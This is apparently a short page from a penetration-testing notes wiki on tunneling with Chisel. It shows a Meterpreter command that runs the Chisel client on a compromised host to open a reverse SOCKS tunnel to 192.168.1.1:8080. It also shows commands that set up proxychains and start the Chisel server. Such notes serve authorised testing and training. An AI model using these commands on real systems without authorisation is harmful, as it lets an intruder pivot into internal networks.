Tunneling

Chisel

Running the Chisel client though a Meterpeter session.

execute -f chisel.exe -a "client 192.168.1.1:8080 R:9050:socks"

Setting up the proxychains configuration file and running the Chisel server on a Linux endpoint.

sed -i "/socks4 127.0.0.1 9050/c\socks5 127.0.0.1 9050" /etc/proxychains4.conf
./chisel server -reverse -p 8080 --socks5 -v

Last updated

Was this helpful?